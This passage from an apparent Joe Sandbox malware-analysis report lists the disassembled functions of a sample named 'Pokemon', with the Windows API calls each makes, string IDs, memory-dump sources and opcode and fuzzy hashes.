                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 000F4620
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000F27B3
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000F27C6
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 000F27F6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                                                                                                                                                      • Opcode ID: 01f08d642e74f9bd76fa8628bbab957a27d2558e641c95b7fd8166369ef4a6e1
                                                                                                                                                                                                                                                                                      • Instruction ID: 34a0537f7bae9a97bafe073b7666464826a3b83593a4b5e45df96c8de8de81ea
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01f08d642e74f9bd76fa8628bbab957a27d2558e641c95b7fd8166369ef4a6e1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA210571A01108BEDB15ABA4EC46CFF77B8DF453A0F108129F522A75E2DF38490AE660
                                                                                                                                                                                                                                                                                      Function 001239B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00123A29
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00123A30
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00123A45
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00123A4D
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                                      • String ID: SysAnimate32
                                                                                                                                                                                                                                                                                      • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                                      • Opcode ID: 02295bc7fe117a2148618005e67abe92be1d2aa0cb34ed8c0b7c2eb1e1ccad84
                                                                                                                                                                                                                                                                                      • Instruction ID: 253b57609e90f1ce6a51f2c0606d690430c11bb6b8e1998376d47e7dfc21ca17
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02295bc7fe117a2148618005e67abe92be1d2aa0cb34ed8c0b7c2eb1e1ccad84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B621CD71A00219ABEF108F64FC80FAB37A9EB49368F105228FAA1D30D0C775CDA19760
                                                                                                                                                                                                                                                                                      Function 000B50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000B508E,?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002), ref: 000B50FD
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000B5110
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,000B508E,?,?,000B502E,?,001598D8,0000000C,000B5185,?,00000002,00000000), ref: 000B5133
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      • Opcode ID: 2686bcfd3bb4850e83158c983973486cca3b05234fc55f38a58420cb9072faf4
                                                                                                                                                                                                                                                                                      • Instruction ID: ab955cc876ce166e8be7a1a42353f1a59721bd21f4f86179dc942b4569bf5169
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2686bcfd3bb4850e83158c983973486cca3b05234fc55f38a58420cb9072faf4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DF06831900208BBDB219F94EC49BDDBFF4EF04752F0400A4F805A2560DB755D91CB95
                                                                                                                                                                                                                                                                                      Function 000EE778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32 ref: 000EE785
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000EE797
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 000EE7BD
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-2590602151
                                                                                                                                                                                                                                                                                      • Opcode ID: ec90aad892e4d7b320a798429a0ebf654978d7be354804c1e5e5e8f5de5432a7
                                                                                                                                                                                                                                                                                      • Instruction ID: a20237cf92b120c4fc1381fdf668b0e2c83968b998900414cdb3ba106553d242
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec90aad892e4d7b320a798429a0ebf654978d7be354804c1e5e5e8f5de5432a7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F02B718055D5AFD7715721DC84EAD36646F15741B1405B4FC45F6410DB30CD95C645
                                                                                                                                                                                                                                                                                      Function 0009663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009664A
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0009665C
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009666E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                                      • Opcode ID: c37fb789554749c9dae8b9b7541b16df1ebb2195cee7c0133883b9bf18c73e05
                                                                                                                                                                                                                                                                                      • Instruction ID: 9a267ea0892957e7fb3bfbffedf62506f3c8c4ed64abc23fe1968055eb963915
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c37fb789554749c9dae8b9b7541b16df1ebb2195cee7c0133883b9bf18c73e05
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4E0C23660263267D7722725FC0CBAE66A89F82F2AB050219FC00E2600DFA0CC6280E5
                                                                                                                                                                                                                                                                                      Function 00096607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096610
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00096622
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096635
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                                      • Opcode ID: 3aa1d70569097a3e84c4e9120b4e0ffec55fb75200280531738bc8c5df78863b
                                                                                                                                                                                                                                                                                      • Instruction ID: 9b5a5763910c273d856352b511eac952be92a95b94af04dcc8bac50b74cbe218
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3aa1d70569097a3e84c4e9120b4e0ffec55fb75200280531738bc8c5df78863b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8D05B35612531B786722B25FC18DCF6B549FD5F513050015FC00A6614DF61CD72D5D9
                                                                                                                                                                                                                                                                                      Function 00103306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001035C4
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 00103646
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0010365C
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010366D
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0010367F
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2bab5e1588ca37d0caabfa7284f5c7519867e847ca9b24db8ca43caa7c572ea
                                                                                                                                                                                                                                                                                      • Instruction ID: b7718ab771097644b06714333d596959a34459a405f925841570aefcc40c20d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2bab5e1588ca37d0caabfa7284f5c7519867e847ca9b24db8ca43caa7c572ea
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55B15C72A00119BBDF15DBA4CC85EDEBBBDEF48314F0040A6F619E7192EB719B458B60
                                                                                                                                                                                                                                                                                      Function 0011ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0011AE87
                                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0011AE95
                                                                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0011AEC8
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0011B09D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 571476ea364b312127c39f1b5b5e486b0cd7103e2d7d59d9dd9f8b90e2939d71
                                                                                                                                                                                                                                                                                      • Instruction ID: 5d0b7b665418425569e2bff1f7ba1f117e033baefb4037727c7a31e41f9fabce
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 571476ea364b312127c39f1b5b5e486b0cd7103e2d7d59d9dd9f8b90e2939d71
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEA1C271A04301AFE724DF24C886FAAB7E5AF48750F54882DF5999B392D771EC41CB81
                                                                                                                                                                                                                                                                                      Function 0011C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
                                                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C505
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C560
                                                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0011C5C3
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0011C606
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0011C613
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f13afe71491302430c796b625ba55ff69536a49d719c61274481017ba90af5a
                                                                                                                                                                                                                                                                                      • Instruction ID: a5ae56acc0724222b3b755a498250f3e8072a871a73348f86eb8f483af2e60f3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f13afe71491302430c796b625ba55ff69536a49d719c61274481017ba90af5a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C61B571208241EFD718DF14C494EAAB7E5FF84318F54856CF0958B2A2DB31ED86CB92
                                                                                                                                                                                                                                                                                      Function 000FED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,000FD7CD,?), ref: 000FE714
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,000FD7CD,?), ref: 000FE72D
                                                                                                                                                                                                                                                                                        • Part of subcall function 000FEAB0: GetFileAttributesW.KERNEL32(?,000FD840), ref: 000FEAB1
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000FED8A
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 000FEDC3
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FEF02
                                                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 000FEF1A
                                                                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 000FEF67
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1e80d731929c1438f28b1c20d9c9d77c2556101ee2e11c0250fca56927ecd88f
                                                                                                                                                                                                                                                                                      • Instruction ID: 5286639f49b75e9f2158de22ea088b441d6ae28bddbc179a64eec6c9596c8850
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e80d731929c1438f28b1c20d9c9d77c2556101ee2e11c0250fca56927ecd88f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 885154B24083899BC774EB54DC919EBB3ECAF84350F00092EF285D3562EF71A6889756
                                                                                                                                                                                                                                                                                      Function 000F9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 000F9534
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 000F95A5
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 000F9604
                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 000F9677
                                                                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 000F96A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                                      • Opcode ID: d02c2a283c112925df090cb711de51f2c36d595f35f9461ae8ff560c8ed36233
